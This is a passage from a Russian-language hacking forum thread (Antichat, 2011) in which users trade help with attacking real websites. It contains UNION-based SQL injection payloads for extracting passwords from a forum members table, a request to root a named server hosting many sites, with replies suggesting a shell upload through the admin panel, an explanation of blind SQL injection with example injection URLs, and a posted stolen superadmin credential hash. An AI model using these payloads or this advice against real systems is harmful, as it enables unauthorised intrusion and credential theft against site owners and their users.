HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16111  
Старый 12.01.2011, 19:27
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

mysql 5 версия

Цитата:
Сообщение от None  
-1+union+Select+1,2,3,4,5,6,7+from+table1.ibf_membe rs+--+
выводимые поля 2 и 3

не выводит

Цитата:
Сообщение от None  
-1+union+Select+1,password,3,4,5,6,7+from+table1.ib f_members+--+
не выводит

Цитата:
Сообщение от None  
-1+union+Select+1,unhex(hex(password)),3,4,5,6,7+fr om+table1.ibf_members+--+
Цитата:
Сообщение от None  
-1+union+Select+1,aes_decrypt(aes_encrypt(password) ),3,4,5,6,7+from+table1.ibf_members+--+
тоже не выводит

group_concat, concat пробовал

из другой любой кроме ibf_members выводит данные, как обойти?
 
Ответить с цитированием

  #16112  
Старый 12.01.2011, 20:00
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

мб написать count(password) и увидеть 0? если всё таки с group_concat не прокатило
 
Ответить с цитированием

  #16113  
Старый 13.01.2011, 02:05
Modex
Новичок
Регистрация: 10.01.2011
Сообщений: 2
С нами: 8072246

Репутация: 0
По умолчанию

Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
 
Ответить с цитированием

  #16114  
Старый 13.01.2011, 02:06
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Modex  
Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
я так понимаю что шeлл у тебя там есть , если ты предлагаешь порутать , и если порутать то давай в студию uname -a
 
Ответить с цитированием

  #16115  
Старый 13.01.2011, 02:23
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от Modex  
Есть сайтик, на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?
Через админку заливайся, раз прав нет.

Как зальешься, тебе сюда /thread235697.html
 
Ответить с цитированием

  #16116  
Старый 13.01.2011, 09:21
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

в SQLI Helper - Blind Dump есть поле Keyword True что оно означает и что нужно туда писать, для Joomla например
 
Ответить с цитированием

  #16117  
Старый 13.01.2011, 09:36
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,

например

http://site/bug?id=1 (в титле выводит "Article 1")

http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")

http://site/bug?id=1+and+1=0 (в титле ничего не выводит)

тогда в этом случае слово "Article 1" будет значением для Keyword
 
Ответить с цитированием

  #16118  
Старый 13.01.2011, 09:52
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Expl0ited  
Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,
например
http://site/bug?id=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=0 (в титле ничего не выводит)
тогда в этом случае слово "Article 1" будет значением для Keyword
А обязательно в титле брать значени Keyword-а

или можно любое значение которое исчезает на странице?
 
Ответить с цитированием

  #16119  
Старый 13.01.2011, 10:01
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Необязательно, значение Keyword это выводимые из БД данные
 
Ответить с цитированием

  #16120  
Старый 13.01.2011, 14:09
valyka80
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8373596

Репутация: 0
По умолчанию

Вообщем наковырял паролей (хешей),но они все вот такиесайт пакистанский)

superadmin:С/FSсЅБvрЛґЈѓЊУ N$Ї
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.